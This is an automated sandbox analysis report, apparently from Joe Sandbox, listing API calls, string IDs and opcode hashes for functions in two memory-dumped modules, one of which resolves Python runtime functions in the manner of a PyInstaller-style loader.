                                                                                                                                                                                                    • Part of subcall function 00007FF7102C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7102C3FA4,00000000,00007FF7102C1925), ref: 00007FF7102C86E9
                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,00007FF7102C5C06,?,00007FF7102C308E), ref: 00007FF7102C81C2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2592636585-0
                                                                                                                                                                                                  • Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                  • Instruction ID: 799ae691fefbf6b69261927d94b6e9027e1aa0cce26d8f7834ee766c34be16b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6D0C201F24A5181FA44BB77BA4657999519F8ABE0F98C034EE5C07B46DC3CE0840B04
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF7102CFFB0,?,?,?,00007FF7102D161A,?,?,?,?,?,00007FF7102D2E09), ref: 00007FF7102DC94A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                  • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                  • Instruction ID: b66641a7b901ad7decbccf79eba50a5acf22d1946a12d6b050cadf510844d3de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCF05E02B1DA8B45FE54767158213B59A805F44770FE84630E82E473C1DE2CF8498730
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: AppPolicyGetThreadInitializationType$AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID$RoInitialize
                                                                                                                                                                                                  • API String ID: 0-3669283627
                                                                                                                                                                                                  • Opcode ID: 0a41683f40b259b1e67c6c9bde6614169f6c19f14045b61a5e850a46e33da5b2
                                                                                                                                                                                                  • Instruction ID: f72d3948a5a94d978c178ac71506f0eca0dcc128a5fe543af2946e5ff6bf49c0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a41683f40b259b1e67c6c9bde6614169f6c19f14045b61a5e850a46e33da5b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F125064B0960782FE599F19F8513B427D2AF8C784B4B513ACC8D9B374FEACF9449202
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                  • String ID: FlsGetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 1452528299-552164261
                                                                                                                                                                                                  • Opcode ID: f0d041f4b4fc85b9cdf17ef866bfe8f9e5e967b850e0db7c2084dec861ba1d8c
                                                                                                                                                                                                  • Instruction ID: 97f9acfdd293b07b20211e6c6139815b6d6506753dfb8d6c0264bf9b484c3ffc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0d041f4b4fc85b9cdf17ef866bfe8f9e5e967b850e0db7c2084dec861ba1d8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E17265B08B4282EA589F55F45137833A1AF8CB84F474136CE8E97375EFBCE9848302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7A1B
                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7A9E
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7ABD
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7ACB
                                                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7ADC
                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7AE5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                                  • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                  • Instruction ID: b54c1747e3f2ea37ddd525ee615bfaaa4371c2f43a82d816aff29c4889bda2d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC418D21A2CE4295EB20BB24E5545BEA761FB947B4FC00232D99D52794DF3CF64ECB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                  • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                  • Instruction ID: e95177c0613eecbf49913d1a9bcbca309b6d0c280c5df1230882e4850c34aa18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84316D72618F8186EB60AF60E8403EEB764FB84754F84403ADB4D57B98DF38E548C720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                  • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                  • Instruction ID: f734927f2a49a84ac24edb6f62906e2ac9ff7c7cb767a393f19f47b46c99b962
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A319332618F8185DB60DF25E8402AEB7A4FB88764F900136EB8D57B55DF3CE549CB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                  • Opcode ID: 267245f3bd38f2c02141a155506c253c2953b48b1ae2e079d631393d28aeaf4b
                                                                                                                                                                                                  • Instruction ID: 338aa4b0bc140d59b832e893565a4988610a15c44189a8415375cdedac5c0d42
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 267245f3bd38f2c02141a155506c253c2953b48b1ae2e079d631393d28aeaf4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3311E76614B8286EB60DF25E8403AA73A4FBC8784F460136DB8D47B69DFBCD545CB01
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1443284424-0
                                                                                                                                                                                                  • Opcode ID: 5e1b83992b63a47b5d58ea9a1a8ea21678f5dac8a57e374f4ac3bcdce7b8afee
                                                                                                                                                                                                  • Instruction ID: a5af044485283e639c0358af399a3f04752e2688319dd806106cb382a4a96fb6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e1b83992b63a47b5d58ea9a1a8ea21678f5dac8a57e374f4ac3bcdce7b8afee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60D10572B18A9289EB10CF74F4402AD37B1F789798F164236DE8E57BA9DE78D446C301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                  • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                                                  • Instruction ID: 9a6751d48dd4ca2d53db9ded90ede848f4fb2065f2bb27e24210d6760ddaa390
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64B1B722B58E8241EA61AB6198501B9EB91EB44BF4FC45132FD5D27B85DF3CF48AC320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D2FE0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE232851), ref: 00007FFEEE1D2FEA
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D2FE0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE232851), ref: 00007FFEEE1D3030
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D2FE0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE232851), ref: 00007FFEEE1D3083
                                                                                                                                                                                                  • GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFEEE22FC10
                                                                                                                                                                                                  • IsValidCodePage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFEEE22FC4B
                                                                                                                                                                                                  • IsValidLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFEEE22FC65
                                                                                                                                                                                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFEEE22FCB2
                                                                                                                                                                                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,00000000,?,00000092,?), ref: 00007FFEEE22FCD1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1491647067-0
                                                                                                                                                                                                  • Opcode ID: 42fa7465111f9485c4452dc4fb25b8dbf29c89794bf053654adb9970e6f8f339
                                                                                                                                                                                                  • Instruction ID: cc6827f83104ab64ecfee501873dd9c7cc1d76ab0ea283d6863623622198e531
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42fa7465111f9485c4452dc4fb25b8dbf29c89794bf053654adb9970e6f8f339
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA816A72A0864286FB10CF60F4517BD23A4AB8DB48F474436CE8D677A4DEBCE985C346
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,00007FFEEE1C1679), ref: 00007FFEEE1DDCBF
                                                                                                                                                                                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,00007FFEEE1C1679), ref: 00007FFEEE215F1E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressInfoLocaleProc
                                                                                                                                                                                                  • String ID: GetLocaleInfoEx$IsValidLocaleName
                                                                                                                                                                                                  • API String ID: 2353564440-3594675595
                                                                                                                                                                                                  • Opcode ID: e34764d3d7dd8039f0e78f5012b24970bdf88d0d388ef93113ccd5e59fef2fb0
                                                                                                                                                                                                  • Instruction ID: 43d69cb8e1169baea24a4bb2a3632005c3f544649bb6863b4d237b96447aa8df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e34764d3d7dd8039f0e78f5012b24970bdf88d0d388ef93113ccd5e59fef2fb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C31E261B18B0282FA148F26B8106B52791AF8CBE0F474639DD9D577B8EFBCE8418341
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C50C0
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5101
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5126
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C514B
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5173
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C519B
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C51C3
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C51EB
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF7102C5C57,?,00007FF7102C308E), ref: 00007FF7102C5213
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                                                  • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                  • Instruction ID: 007de732a26b705d416c45ba53f4c1a18ed0113852da06de165b60f022ed310d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF12D46099EF1791FA16FB44A9101B6ABA4AF49770FE41439C81E22364EF3DF58DC270
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
